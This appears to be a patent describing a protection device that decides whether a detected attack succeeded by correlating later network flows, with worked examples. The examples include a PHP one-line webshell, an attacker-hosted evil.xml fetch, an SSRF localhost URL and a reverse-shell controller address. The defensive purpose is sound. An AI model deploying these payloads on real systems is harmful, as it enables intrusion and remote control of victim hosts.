  • the basic principle of an outgoing request attack is that the attacking host sends outgoing request attack packets to the attacked host.
  • the attacked host After the attacked host receives the outgoing request attack message, it will actively send a request for the resources on the specified host on the Internet, and the resources on the specified host on the Internet often contain malicious code, thus affecting the attacked.
  • Host security is an attack initiated by the attacked host requesting resources on a specified host in the Internet.
  • the first data stream includes an outgoing request attack message
  • the attack data in the payload content of the outgoing request attack message includes: A locator of a resource on a given host in the Internet.
  • the data stream transmitted after the outgoing request attack event will contain the following characteristics: the initiator of the data stream is the attacked host, and the responder of the data stream is the designated host in the Internet.
  • the data stream contains requests from the attacked host for resources on the specified host on the Internet.
  • the protection device can correlate with the data flow with the above-mentioned characteristics (ie, the second data flow in the method 200), so as to determine that the outgoing request attack is successful.
  • the protection device implements the association between the two data streams according to the address of the attacked host, the locator of the resource on the designated host in the Internet, and the protocol used by the payload. Specifically, the protection device obtains the address of the attacked host and the locator of the resource on the specified host in the Internet from the attack data contained in the payload content, and determines the protocol used by the payload of the first data stream.
  • the protection device determines that the outgoing request attack event is a successfully executed attack event.
  • the address of the attacked host is, for example, the IP address of the attacked host.
  • the SSRF attack is an attack initiated by the attacked host requesting resources on the specified host in the local area network.
  • the basic principle of an SSRF attack is that the attacking host sends SSRF attack packets to the attacked host.
  • the SSRF attack packet is usually a request forged by the attacking host to obtain resources on the attacked host.
  • the typical case of the request is to contain a URL similar to the nested form.
  • the host field of the URL includes the domain name or IP address of the attacked host.
  • the parameter field of the URL in turn contains the URL of the resource on the specified host in the local area network.
  • the attacked host will actively send a request for resources on the specified host in the LAN, which will adversely affect the security of the LAN.
  • the first data stream includes an SSRF attack packet
  • the attack data in the payload content of the SSRF attack packet includes resources on the designated host in the local area network. URL.
  • the data stream transmitted after the SSRF attack event will contain the following characteristics: the initiator of the data stream is the attacked host, and the responder of the data stream is the designated host in the local area network.
  • the data stream contains requests from the attacked host for resources on the specified host in the local area network.
  • the protection device can correlate with the data flow with the above-mentioned characteristics (ie, the second data flow in the method 200), so as to determine that the attack is successful.
  • the protection device implements the association between the two data streams according to the address of the attacked host, the locator of the resource on the designated host in the local area network, and the protocol used by the payload. Specifically, the protection device obtains the address of the attacked host and the locator of the resource on the designated host in the local area network from the attack data contained in the payload, and determines the protocol used by the payload of the first data stream.
  • the protection device determines the SSRF attack event as a successfully executed attack event.
  • the address of the attacked host is, for example, the IP address of the attacked host.
  • File implantation attacks are attacks initiated by implanting Trojan files into the attacked host.
  • file implantation attacks please refer to the content related to Example 4 below.
  • the protection device realizes the association between two data streams according to the address of the attacked host and the file name of the Trojan file. Specifically, the protection device obtains the address of the attacked host and the file name of the Trojan file from the attack data contained in the payload. If the responder address of the second data stream includes the address of the attacked host, and the second data stream includes a successful request for accessing the Trojan file, the protection device determines that the file implantation attack event is an attack event that is successfully executed.
  • the address of the attacked host is, for example, the IP address of the attacked host.
  • the flowchart of FIG. 3 includes the following steps S31 to S35.
  • step S31 the protection device extracts the data stream as an input to the attack detection process in step S32 described below.
  • step S32 the protection device invokes different attack detection algorithms to perform attack detection on the data stream, such as deserialization attack detection, XML external entity (XXE) attack detection, command injection detection, overflow attack detection, and the like.
  • XXE XML external entity
  • Step S33 After detecting the attack event in the data stream, the protection device obtains attack data from the payload content of the data stream. The protection device determines the success of the attack based on the attack data. The attack success determination is to determine whether the attack event is an attack event that is successfully executed.
  • step S34 in the attack scenario where there is an echo (that is, the response content includes the execution result of the attack data), the protection device determines the success of the attack by means of single-stream determination. Specifically, the protection device determines whether the attack event is a successfully executed attack event according to whether the response message of the server in the above-mentioned attack detected data stream contains the expected result corresponding to the attack data.
  • step S35 in the scenario where there is no echo, the protection device determines the success of the attack by means of multi-stream association. Specifically, the protection device correlates other data streams transmitted subsequently based on the expected subsequent behavior after the attack data is successfully executed. If it is associated with the expected subsequent behavior, the protection device determines that the attack event is a successfully executed attack event.
  • FIG. 3 The flow of FIG. 3 is illustrated below with reference to four examples.
  • the following four instances correspond to four attack scenarios, namely, rebound shell attack, outgoing request attack, SSRF attack, and file implantation attack.
  • T is used to denote a specific time window.
  • Example 1 is an illustration of the method shown in FIG. 2 .
  • the attack event detected in FIG. 2 is a rebound shell attack event.
  • Example 1 shows how to identify whether the attack is successful or not based on the mechanism of multi-flow correlation in the scenario of rebound shell attack.
  • the flowchart of the successful determination of the rebound shell attack is specifically shown in FIG. 4 , including the following steps S40 to S45 .
  • step S40 the protection device performs attack detection on the input data stream (ie, the first data stream in FIG. 2), and detects a rebound shell attack event.
  • step S41 the protection device parses the data flow to obtain the payload content of the rebound shell attack packet.
  • the bounce shell attack packet is a packet that guides the occurrence of a bounce shell attack event.
  • step S42 the protection device extracts attack data from the payload content, parses the attack data, and extracts the IP address of the control terminal of the rebound shell and the port number of the control terminal.
  • step S43 the protection device associates the TCP flow (ie, the second data flow in FIG. 2) within a period of time T after the bounce shell attack event.
  • TCP flow ie, the second data flow in FIG. 2
  • the value range of T is [0,5min].
  • T In general, after the attacked host successfully executes the attack data, the attacked host will immediately perform subsequent operations, and the time interval is within the range of seconds. Considering the complexity of the existing network environment, the success rate of correlation analysis can be enhanced. This sets the value range of T to [0,5min].
  • step S44 if the source IP address associated with a TCP stream is the IP address of the attacked host, the destination IP address is the IP address of the rebound shell control terminal, and the port number is the port number of the rebound shell control terminal, this situation indicates that the attacked host is attacked After that, the rebound shell attack data is successfully executed, and a connection request is actively initiated to the rebound shell control terminal.
  • the protection device determines that the rebound shell attack event is a successfully executed attack event.
  • step S45 if there is no TCP flow that meets the above-mentioned association conditions, the protection device determines that the bounce shell attack event is an attack event that fails to be executed.
  • step S42 the attack data extracted by the protection device from the payload content of the rebound shell attack packet is as follows.
  • the IP address of the rebound shell control terminal extracted from the attack data by the protection device is: 192.168.1.10, and the port number of the rebound shell control terminal is 4444.
  • step S44 if in the traffic after the above-mentioned attack occurs, it is found that a data flow contains the attacked host to initiate a TCP connection request to the bounce shell control terminal IP address 192.168.1.10 and port 4444, no matter whether the bounce shell connection is successfully established or not, All indicate that the attacked host successfully executed the rebound shell attack data, and the protection device determines that the rebound shell attack event is an successfully executed attack event.
  • Example 2 is an illustration of the method shown in FIG. 2 .
  • the attack event detected in FIG. 2 is an outgoing request attack event.
  • Example 2 shows how to identify whether the attack is successful or not based on the mechanism of multi-flow association in the scenario of an outgoing request attack.
  • the successful determination of the outgoing request attack includes the following steps S50 to S55.
  • Step S50 the protection device performs attack detection on the input data stream (ie, the first data stream in FIG. 2 ), and detects an outgoing request attack event.
  • step S51 the protection device parses the packets in the data flow, and obtains the payload content of the outgoing request attack packet.
  • step S52 the protection device extracts attack data from the payload content, parses the attack data, and extracts the outgoing request URL.
  • step S53 within a period of time T after the occurrence of the outgoing request attack event associated with the protection device (same as example 1, the value range of T is [0, 5min]), whether the attacked host sends a connection request to the outgoing request URL.
  • the data stream that needs to be associated needs to be determined according to the specific protocol in the payload, such as HTTP, HTTPS, DNS, RMI, LDAP, etc.
  • step S54 is related to the data stream including the external connection request sent by the attacked host (ie, the second data stream in FIG. 2 ), the protection device determines that the outgoing request attack event is a successfully executed attack event.
  • step S55 if there is no data stream that meets the above-mentioned association conditions, the protection device determines that the outgoing request attack event is an attack event that fails to be executed.
  • step S52 the attack data extracted by the protection device from the payload content of the deserialized outgoing request attack packet is as follows.
  • the outgoing request URL extracted by the protection device from the above attack data is: http://attacker_server/evil.xml, which is a malicious URL controlled by the attacker, and the file evil.xml corresponding to this URL often contains malicious code.
  • step S54 if in the traffic after the above attack occurs, the protection device finds that there is a data stream that includes the attacked host sending a connection request to the external URL http://attacker_server/evil.xml, no matter whether the HTTP connection is established or not, it will be If the attacked host successfully executes the attack data, the protection device determines that the attack is successful.
  • Example 3 is an illustration of the method shown in FIG. 2 .
  • the attack event detected in FIG. 2 is an SSRF attack event.
  • the SSRF attack success determination includes the following steps S60 to S65.
  • Step S60 the protection device performs attack detection on the input data stream (ie, the first data stream in FIG. 2 ), and detects an SSRF attack event.
  • step S61 the protection device parses the data flow to obtain the payload content of the SSRF attack packet.
  • step S62 the protection device extracts attack data from the payload content, parses the attack data, and extracts the SSRF intranet URL.
  • the SRF intranet URL refers to the URL of the resource on the intranet host specified by the attacker to be accessed by the attacked host.
  • step S63 the protection device correlates the data flow within a period of time T after the SSRF attack event occurs (same as example 1, the value range of T is [0,5min]), and the protection device determines whether the attacked host sends a request to the SSRF intranet URL , which needs to be associated with different protocols in the payload, such as HTTP, HTTPS, file, etc.
  • step S64 if it is related to the data stream that the attacked host initiates a request to the SSRF intranet URL (ie, the second data stream in FIG. 2), the protection device determines that the SSRF attack event is a successfully executed attack event.
  • step S65 if there is no data stream that meets the above-mentioned association conditions, the protection device determines that the SSRF attack event is an attack event that fails to be executed.
  • the attack data extracted by the protection device from the payload content of the SSRF attack packet is as follows.
  • the above attack data is in the form of a URL, where the content of the host field includes victim_server, and the content of the parameter field includes http://localhost/admin.php.
  • the meaning of the above URL is that the attacker requests the attacked host victim_server to access the file admin.php on the intranet host localhost.
  • the SSRF intranet URL extracted by the protection device from the above attack data is: http://localhost/admin.php.
  • step S63 if in the traffic after the above attack occurs, the protection device finds that there is a data stream that contains the attacked host sending a request to the intranet URL http://localhost/admin.php, no matter whether the connection is established or not, it will be It means that the attacked host successfully executes the attack data, and the protection device determines that the SSRF attack event is an attack event that is successfully executed.
  • Example 4 is an illustration of the method shown in FIG. 2 .
  • the attack event detected in FIG. 2 is a Webshell implantation attack event.
  • the successful determination of the Webshell implantation attack includes the following steps S70 to S75.
  • step S70 the protection device performs attack detection on the input data stream (ie, the first data stream in FIG. 2), and detects a Webshell implantation attack event.
  • step S71 the protection device parses the data flow, and obtains the payload content of the Webshell implantation attack packet.
  • step S72 the protection device extracts attack data from the payload content, parses the attack data, and extracts the file name of the implanted Webshell file.
  • Step S73 Check whether there is a behavior that the external host successfully accesses the Webshell file within a period of time T after the occurrence of the Webshell implantation event associated with the protection device, and the value range of T is [0, 30min].
  • step S74 is associated with a data stream (ie, the second data stream in FIG. 2 ) that has an event of successfully accessing the webshell file
  • the protection device determines that the webshell implantation event is an attack event that is successfully executed.
  • step S75 if there is no successful event associated with accessing the Webshell file, the protection device determines that the Webshell implantation event is an attack event that fails to execute.
  • step S72 the attack data extracted by the protection device from the payload content of the Webshell implanted attack packet is as follows.
  • the above attack data creates a one-sentence Trojan horse through injection. If the execution is successful, the attacked host will create the Webshell file shell.php.
  • the file name of the Webshell file extracted by the protection device from the above attack data is shell.php.
  • the protection device finds that there is a data stream that contains an external host requesting access to shell.php on the attacked host and the access is successful, it means that the attacked host successfully executes the above attack data, and the shell.php file is created locally, the protection device determines that the Webshell implantation attack event is a successful attack event.
  • the above describes the overall process of how to identify a successful Webshell implantation attack.
  • the above-mentioned identification process for a successful attack involves how to determine whether the Webshell file is successfully accessed. If the Webshell file access is successful, it proves that the Webshell implantation event is a successful attack event. If there is only an attempt to access the Webshell file, it does not prove that the Webshell implantation event is a successful attack event.
  • the access success determination process includes the following steps 1 to 3.
  • Step 1 The attacking host IP_Attacker1 sends Trojan implantation attack data to the attacked host IP_Victim.
  • Trojan implantation attack data is used to implant Trojans in the form of Webshell files into the attacked host IP_Victim.
  • the Trojan implantation attack data is shown below.
  • shell.php is the file name of the Trojan file, ⁇ ? php@eval($_POST['pass']);? > is the content of the Trojan horse in one sentence.
  • the attack principle of the above-mentioned Trojan horse implanting attack data is to implant a sentence Trojan horse into the attacked host through a command injection vulnerability. If the execution is successful, the Webshell file shell.php will be created on the attacked host.
  • a word Trojan is a kind of Trojan.
  • the Trojan horse is generally divided into a one-sentence Trojan horse, a small horse, and a large horse.
  • a one-sentence Trojan horse refers to a Trojan horse with only one line of code, and the content is very concise.
  • Step 2 After the attacking host IP_Attacker1 tries to implant the Trojan file, the attacker IP_Attacker2 tries to access the implanted Trojan file shell.php. If the attacker IP_Attacker2 can access successfully, it proves that the implantation action in step 1 is executed successfully.
  • IP_Attacker2 and IP_Attacker1 may be the same host or different hosts.
  • Step 3 The protection device identifies whether the Trojan file is successfully connected in Step 2.
  • the protection device recognizes whether the connection to the Trojan file is successful, for example, using the following two implementation methods.
  • the attacked host After the attacked host receives the Trojan file access request in the above step 2, the attacked host will generate and return a response message.
  • the protection device obtains the response packet of the attacked host and determines whether the response packet contains the specified characteristics. If the response packet contains the specified characteristics, the protection device determines that the Trojan file is successfully accessed.
  • the specified feature is also called the echo mark feature after the Trojan is connected successfully.
  • the specified characteristic is, for example, a string.
  • the attacker IP_Attacker2 sends an HTTP request message to the attacked host to access the Trojan file shell.php.
  • the request line in the HTTP request message indicates an attempt to connect to the Trojan file shell.php.
  • the content of the request line is: post/shell.php HTTP/1.1.
  • the meaning of each field is that post indicates that the request method is post, shell.php indicates that the requested URL is shell.php, and HTTP/1.1 indicates that the protocol version is HTTP1.1.
  • the attacked host receives HTTP request packets, generates and returns HTTP response packets.
  • the protection device obtains the HTTP response packet and extracts the content of the response body. If the starting position of the response body in the HTTP response packet includes the string "->
  • " exists in most one-sentence Trojans, such as the one-sentence Trojans used by attack tools such as kitchen knife and XISE.
  • the attacked host After the attacked host receives the Trojan file access request in the above step 2, the attacked host will generate and return a response message.
  • the protection device obtains the response packet of the attacked host and determines whether the response packet contains the execution result of the control command. If the response packet contains the execution result of the control command, the protection device determines that the Trojan file is successfully accessed.
  • the control command is used to instruct the attacked host to perform a corresponding operation.
  • the protection device parses the Trojan file access request in the above step 2, and obtains the attacker's control command from the payload content of the Trojan file access request.
  • the control command included in the Trojan file access request is the id command, and the id command is used to obtain information such as user ID and group ID. If the response packet includes the ID information of the user related to the attacked host, the protection device determines that the Trojan file is successfully accessed.
  • the attacker IP_Attacker2 sends an HTTP request message to the attacked host to access the Trojan file shell.php.
  • the request line in the HTTP request message indicates an attempt to connect to the Trojan file shell.php.
  • the request line in the HTTP request message contains: post/shell.php HTTP/1.1.
  • the request data of the HTTP request message contains the command to be executed: id.
  • the attacked host returns an HTTP response packet for the HTTP request packet.
  • the protection device judges whether the id command is successfully executed according to the content of the response body in the HTTP response message of the attacked host.
  • the execution result of the id command When the protection device finds that the HTTP response packet contains this content, it determines that the id command in the HTTP request packet is successfully executed, that is, the attacker IP_Attacker2 successfully communicates with the Trojan file shell.php on the attacked host. .
  • the second method is more general. After the attacker implants a Trojan file and the connection is successful, it will send relevant instructions to perform subsequent operations. This method is to determine whether the command sent by the attacker is successfully executed on the attacked host. If the command is executed successfully, it means that the connection to the Trojan horse file is successful and communication is established, which means that the initial Trojan horse implantation attack event is a successful execution event.
  • the above two implementations can be essentially summarized into one method, that is, the successful determination of an attack based on a data stream mainly depends on the data that the attacked host responds to.
  • the first implementation method is based on the specific echo characteristics after a specific Webshell file is connected, and the second implementation method is based on the attacker's command execution result.
  • the methods provided by the above embodiments help to screen out high-value successful attack events from a large number of security events, help operation and maintenance personnel to discover compromised assets in time, and prioritize high-risk events with successful attacks.
  • the method provided in this embodiment is not limited to the rebound shell scenario, outgoing request scenario, SSRF scenario, Webshell implant scenario, etc. described in the above four examples, as long as the successful attack solution is identified through multi-flow correlation, it is all in the embodiments of this application within the scope of protection.
  • the value of the time window T in the above four examples is only a reference value for implementation. As long as the idea is the same as that of this embodiment, the value of T is different from the reference value in this embodiment, which is also within the protection scope of this embodiment.
  • FIG. 8 is a schematic structural diagram of a protective device provided by an embodiment of the present application.
  • the protective device 800 shown in FIG. 8 is used to implement the successful attack identification method described in FIG. 2 , FIG. 3 , FIG. 4 , FIG. 5 , FIG. 6 or FIG. 7 .
  • the protective device 800 shown in FIG. 8 is one of the firewalls, probes or security analysis devices in FIG. 1 ; or, the protective device shown in FIG. 8 800 is an integrated device of two or more devices in the firewall, probe and security analysis device in FIG. 1, for example, the protection device 800 in FIG. 8 is a cluster computer, the processor 801 in FIG. 8, processing The server 805, the network interface 804, etc. are distributed on different computers.
  • the protective device 800 shown in FIG. 8 is the protective device in FIG. 2 .
  • the protective device 800 includes at least one processor 801 , a communication bus 802 , memory 803 and at least one network interface 804 .
  • the processor 801 is, for example, a general-purpose central processing unit (central processing unit, CPU), a network processor (network processor, NP), a graphics processing unit (graphics processing unit, GPU), a neural-network processing unit (neural-network processing units, NPU) ), a data processing unit (DPU), a microprocessor or one or more integrated circuits for implementing the solution of the present application.
  • the processor 801 includes an application-specific integrated circuit (ASIC), a programmable logic device (PLD), or a combination thereof.
  • the PLD is, for example, a complex programmable logic device (CPLD), a field-programmable gate array (FPGA), a generic array logic (GAL), or any combination thereof.
  • the processor 801 implements the methods in the foregoing embodiments by reading program codes 810 stored in the memory 803, or the processor 801 implements the methods in the foregoing embodiments by using internally stored program codes.
  • the processor 801 implements the method in the above embodiment by reading the program code 810 saved in the memory 803, the memory 803 saves the program code for realizing the successful attack identification method provided by the embodiment of the present application.
  • the protection device 800 After the program code 810 stored in the memory 803 is read by the at least one processor 801, the protection device 800 performs the following operations: perform attack detection on the first data stream obtained through the network interface 804; if an attack is detected in the first data stream The attack data is extracted from the payload content of the first data stream; the identifier of the attacked host is obtained from the header of the first data stream; the second data stream is obtained through the network interface 804, and the second data stream is the first data stream The data stream transmitted after the attack event occurs in the data stream; according to the attack data and the identity of the attacked host, detect whether the second data stream and the first data stream satisfy the association condition; if the second data stream and the first data stream satisfy the association condition, The attack event is determined to be a successfully executed attack event.
  • the network interface 804 is used for receiving data streams, such as the above-mentioned first data stream and second data stream.
  • the network interface 804 uses any transceiver-like device for communicating with other devices or communication networks.
  • Network interface 804 includes a wired network interface, and optionally a wireless network interface.
  • the wired network interface may be, for example, an Ethernet interface.
  • the Ethernet interface can be an optical interface, an electrical interface or a combination thereof.
  • the wireless network interface may be a wireless local area network (wireless local area networks, WLAN) interface, a cellular network interface or a combination thereof, and the like.
  • the memory 803 is used to store the data stream received by the network interface 804 .
  • the memory 803 is, for example, a read-only memory (read-only memory, ROM) or other types of static storage devices that can store static information and instructions, or a random access memory (random access memory, RAM) or a memory device that can store information and instructions.
  • ROM read-only memory
  • RAM random access memory
  • EEPROM electrically erasable programmable read-only memory
  • CD-ROM compact disc read-only memory
  • optical disks storage including compact discs, laser discs, compact discs, digital versatile discs, Blu-ray discs, etc.
  • magnetic disk storage media or other magnetic storage devices, or capable of carrying or storing desired program code in the form of instructions or data structures and capable of Any other medium accessed by a computer without limitation.
  • the memory 803 exists independently, for example, and is connected to the processor 801 through the communication bus 802 .
  • the memory 803 may also be integrated with the processor 801 .
  • the communication bus 802 is used to transfer information between the aforementioned components.
  • the communication bus 802 can be divided into an address bus, a data bus, a control bus, and the like. For ease of representation, only one thick line is shown in FIG. 8, but it does not mean that there is only one bus or one type of bus.
  • the processor 801 optionally includes one or more CPUs, such as CPU0 and CPU1 shown in FIG. 8 .
  • protective device 800 also includes output devices and input devices.
  • the input device is used to receive the user's detection requirements (for example, to detect the data flow of a specified protocol, and the data flow of a specified network segment).
  • the input device is in communication with the processor 801, optionally receiving user input in a variety of ways.
  • the input device is optionally a mouse, a keyboard, a touch screen device or a sensing device, or the like.
  • the output device communicates with the processor 801 .
  • the output device is used to output the detection result of the processor 801 (that is, whether the attack event is an attack event that is successfully executed).
  • the output device optionally displays information in a variety of ways.
  • the output device is optionally a liquid crystal display (LCD), a light emitting diode (LED) display device, a cathode ray tube (CRT) display device, or a projector (projector) Wait.
  • the output device communicates with the processor 801 and can display information in a variety of ways.
  • the output device may be a liquid crystal display (LCD), a light emitting diode (LED) display device, a cathode ray tube (CRT) display device, a projector, or the like.
  • the protection device 800 provided in this embodiment of the present application is configured to execute the successful attack identification method provided by each of the foregoing method embodiments. Since the protection device 800 uses the multi-stream association mechanism to determine whether the attack is successful, it can solve the problem of how to determine the success of the attack in the scenario where the server has no response or the execution result of the attack data is not included in the response content.
  • FIG. 9 is a schematic structural diagram of an attack successful identification device 900 provided by an embodiment of the present application.
  • the attack successful identification device 900 shown in FIG. 9 for example, implements the function of the protection device in FIG. 2 .
  • the attack success identification device 900 includes a detection unit 901 , a processing unit 902 and an acquisition unit 903 .
  • the detection unit 901 is configured to support the successful attack identification device 900 to perform step S201.
  • the processing unit 902 is configured to support the attack successful identification device 900 to perform step S202, step S203, step S205 and step S206.
  • the obtaining unit 903 is configured to support the attack success identifying apparatus 900 to perform step S204.
  • each unit in the attack success identification device 900 is implemented by software, hardware, firmware, or any combination thereof.
  • Each unit in the attack successful identification apparatus 900 is used to perform the corresponding functions of the protection device in FIG. 2 above.
  • the apparatus embodiment described in FIG. 9 is only illustrative.
  • the division of the above-mentioned units is only a logical function division. In actual implementation, there may be other division methods.
  • multiple units or components may be combined or may be Integration into another system, or some features can be ignored, or not implemented.
  • Each functional unit in each embodiment of the present application may be integrated into one processing unit, or each unit may exist physically alone, or two or more units may be integrated into one unit.
  • the above-mentioned units in FIG. 9 can be implemented either in the form of hardware or in the form of software functional units.
  • the detection unit 901 and the processing unit 902 may be implemented by software functional units generated after at least one processor 801 in FIG.
  • the detection unit 901 is composed of a part of the processing resources in at least one processor 801 in FIG. 8 (for example, one core or two of the multi-core processors). cores), and the processing unit 902 is implemented by the rest of the processing resources in at least one processor 801 in FIG. FPGA), or programmable devices such as coprocessors.
  • the obtaining unit 903 is realized by the network interface 804 in FIG. 8 .
  • the above functional units can also be implemented by a combination of software and hardware.
  • the detection unit 901 is implemented by a hardware programmable device
  • the processing unit 902 is a software functional unit generated after the CPU reads the program code stored in the memory.
  • a chip including a memory and a processor, where the memory is used for storing computer instructions, and the processor is used for calling and executing the computer instructions from the memory, so as to execute the methods in each of the above method embodiments.
  • first and second in the description and claims of the embodiments of the present application are used to distinguish different objects, rather than used to describe the specific order of the objects, nor should they be construed as indicating or implying relative importance sex.
  • first data stream and the second data stream are used to distinguish different data streams, but are not used to describe a specific sequence of the data streams, nor can it be understood that the first data stream is more important than the second data stream.
  • A refers to B, which means that A is the same as B or A is a simple variation of B.
  • a computer program product includes one or more computer instructions.
  • the computer may be a general purpose computer, a special purpose computer, a computer network, or other programmable device.
  • Computer instructions may be stored in or transmitted from one computer-readable storage medium to another computer-readable storage medium, for example, the computer instructions may be transmitted from a website site, computer, server, or data center over a wire (e.g.
  • a computer-readable storage medium can be any available medium that can be accessed by a computer or a data storage device such as a server, a data center, or the like that includes an integration of one or more available media.
  • Useful media may be magnetic media (eg, floppy disks, hard disks, magnetic tapes), optical media (eg, DVD), or semiconductor media (eg, Solid State Disk (SSD)), among others.

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Health & Medical Sciences (AREA)
  • General Health & Medical Sciences (AREA)
  • Virology (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)
  • Computer And Data Communications (AREA)

Abstract

本申请提供了一种攻击成功识别方法及防护设备,属于网络技术领域。本申请提供了一种利用多流关联的机制判定是否攻击成功的方法,通过从检测到攻击事件的数据流中获得攻击数据以及被攻击主机的标识,利用攻击数据以及被攻击主机的标识,对检测到攻击事件的数据流与该数据流之后的其他数据流进行关联,根据是否关联到其他数据流来判定是否攻击成功。该方法能够解决服务端无回显或响应内容中不包含攻击数据的执行结果的场景如何攻击成功判定的问题,有助于更有效地从海量攻击告警中识别出执行成功的攻击事件。

Description

攻击成功识别方法及防护设备
本申请要求于2021年01月21日提交的申请号为202110084243.8、发明名称为“攻击成功识别方法及防护设备”的中国专利申请的优先权,其全部内容通过引用结合在本申请中。
技术领域
本申请涉及网络技术领域,特别涉及一种攻击成功识别方法及防护设备。
背景技术
互联网每天都发生着大量的攻击。其中,大多数攻击属于失败攻击,例如工具批量扫描、载荷内容不符合目标系统、服务器不存在相应漏洞等。这些失败攻击无法真正对目标造成威胁,需要重点关注的攻击是成功攻击。有鉴于此,如何有效识别攻击成功已经成为本领域的研究热点。
相关技术利用服务端的响应内容来判断是否攻击成功。具体来说,防护设备基于特征库对通信对端之间传输的一个数据流中的报文进行攻击检测。如果防护设备检测出攻击事件,那么防护设备从产生攻击事件的报文的载荷内容(payload)中提取攻击数据,并确定攻击数据被服务端执行后的预期结果。之后,防护设备进一步确定上述数据流中来自于服务端的响应报文中是否实际包含上述预期结果。如果上述数据流中来自于服务端的响应报文中包含上述预期结果,则判定攻击成功。如果上述数据流中来自于服务端的响应报文中未包含上述预期结果,则判定攻击失败。
上述方法只能针对有回显的攻击类型(即响应内容中包含攻击数据的执行结果),来判断是否攻击成功,因此适用场景受限,无法有效地从海量攻击告警中识别出执行成功的攻击事件。
发明内容
本申请实施例提供了一种攻击成功识别方法及防护设备,能够更有效地识别执行成功的攻击事件。所述技术方案如下:
第一方面,提供了一种攻击成功识别方法,在该方法中,对第一数据流进行攻击检测;若在第一数据流中检测到攻击事件,从第一数据流的载荷内容中提取攻击数据;从第一数据流的报文头获得被攻击主机的标识;获取第二数据流,第二数据流是第一数据流中的攻击事件发生之后传输的数据流;根据攻击数据以及被攻击主机的标识,检测第二数据流与第一数据流是否满足关联条件;如果第二数据流与第一数据流满足关联条件,确定攻击事件为执行成功的攻击事件。
以上提供了一种利用多流关联的机制判定是否攻击成功的方法,通过从检测到攻击事件的数据流中获得攻击数据以及被攻击主机的标识,利用攻击数据以及被攻击主机的标识,对检测到攻击事件的数据流与该数据流之后的其他数据流进行关联,根据是否关联到其他数据流来判定是否攻击成功。该方法能够解决服务端无回显或响应内容中不包含攻击数据的执行 结果的场景如何攻击成功判定的问题,适用场景更加丰富,有助于更有效地从海量攻击告警中识别出执行成功的攻击事件。
在一些实施例中,上述第二数据流与上述第一数据流的传输时间间隔小于或小于等于时间窗口。
通过关联检测到攻击的数据流之后时间窗口内的数据流,有助于提升识别成功率,并兼顾性能开销。
在一些实施例中,上述被攻击主机的标识是根据上述第一数据流响应方的目的地址信息确定的,上述被攻击主机位于局域网中,上述第一数据流是位于互联网中的攻击主机向上述被攻击主机发起的。
通过使用局域网中被攻击主机的地址关联数据流,与向局域网发起攻击的场景更加匹配,有助于提升识别成功率。
关联检测到攻击的数据流之后时间窗口内的数据流,有助于提升识别成功率,并兼顾性能开销。
在一些实施例中,上述攻击数据包括指定对象的标识。
通过使用攻击数据中指定对象的标识关联数据流,有助于提升识别成功率。
在一些实施例中,上述指定对象为指定主机,上述指定对象的标识为上述指定主机的地址;或者,上述指定对象为上述被攻击主机上保存的指定文件,上述指定对象的标识为上述指定文件的标识;或者,上述指定对象为指定资源,上述指定资源的标识为上述指定资源的定位符;或者,上述指定对象为指定端口,上述指定对象的标识为上述指定端口的端口号。
通过使用攻击数据中指定的主机、文件、资源、端口等进行多流关联,与反弹攻击、恶意文件、端口扫描等具体的攻击场景更加匹配,因此有助于提升识别成功率。
在一些实施例中,上述攻击事件包括反弹壳(shell)攻击,上述指定主机为反弹shell的控制端,上述攻击数据中指定主机的地址为反弹shell的控制端的地址,上述反弹shell攻击为上述被攻击主机向上述控制端发送请求从而发起的攻击。
通过利用攻击数据中反弹shell的控制端的地址关联,有助于准确关联到攻击流量,进而提升攻击成功识别的准确性。
在一些实施例中,上述攻击数据中反弹shell的控制端的地址包括上述控制端的互联网协议(internet protocol,IP)地址、或者上述控制端的IP地址和端口号的组合。
通过使用反弹shell的控制端的IP地址以及端口号关联,有助于在海量流量中更精确地关联到控制端的攻击流量,进而提升攻击成功识别的准确性。
在一些实施例中,上述被攻击主机的标识包括上述被攻击主机的IP地址,上述第二数据流与上述第一数据流满足上述关联条件,包括:上述第二数据流的发起方互联网协议IP地址包括上述被攻击主机的IP地址,且上述第二数据流的响应方的地址为上述反弹shell的控制端的地址。
通过将被攻击主机的地址以及反弹shell的控制端的地址作为多流关联的条件,有助于提升多流关联的准确性,进而提升攻击成功识别的准确性。
在一些实施例中,上述攻击事件包括外发请求攻击,上述攻击数据包括互联网中指定主机上资源的定位符,上述外发请求攻击为上述被攻击主机请求上述互联网中指定主机上资源从而发起的攻击。
通过利用攻击数据中资源的定位符关联,有助于准确关联到攻击流量,进而提升攻击成功识别的准确性。
在一些实施例中,上述第二数据流与上述第一数据流满足上述关联条件,包括:上述第二数据流的发起方的IP地址包括上述被攻击主机的IP地址,且上述第二数据流包括上述互联网中指定主机上资源的定位符,且上述第二数据流所基于的协议为上述第一数据流的载荷使用的协议。
通过将被攻击主机的IP地址以及资源的定位符作为多流关联的条件,有助于提升多流关联的准确性,进而提升攻击成功识别的准确性。
在一些实施例中,上述攻击事件包括服务器端请求伪造(Server-Side Request Forgery,SSRF)攻击,上述攻击数据包括局域网中指定主机上资源的定位符,上述SSRF攻击为上述被攻击主机请求上述局域网中指定主机上资源从而发起的攻击。
通过利用攻击数据中资源的定位符关联,有助于准确关联到攻击流量,进而提升攻击成功识别的准确性。
在一些实施例中,上述被攻击主机的标识包括上述被攻击主机的IP地址,上述第二数据流与上述第一数据流满足上述关联条件,包括:上述第二数据流的发起方IP地址包括上述被攻击主机的IP地址,且上述第二数据流包括上述局域网中指定主机上资源的定位符,且上述第二数据流所基于的协议为上述第一数据流的载荷使用的协议。
通过将被攻击主机的IP地址以及资源的定位符作为多流关联的条件,有助于提升多流关联的准确性,进而提升攻击成功识别的准确性。
在一些实施例中,上述攻击事件包括文件植入攻击,上述指定文件为木马文件,上述攻击数据中上述指定文件的标识为被攻击主机上木马文件的文件名,上述文件植入攻击为通过向上述被攻击主机植入木马文件而发起的攻击。
通过利用攻击数据中木马文件的文件名做关联,有助于准确关联到攻击流量。
在一些实施例中,上述被攻击主机的标识包括上述被攻击主机的IP地址,上述第二数据流与上述第一数据流满足上述关联条件,包括:上述第二数据流的响应方地址包括上述被攻击主机的IP地址,且上述第二数据流包括针对上述木马文件的访问成功请求。
通过将被攻击主机的IP地址以及是否成功访问木马文件作为多流关联的条件,有助于提升攻击成功识别的准确性。
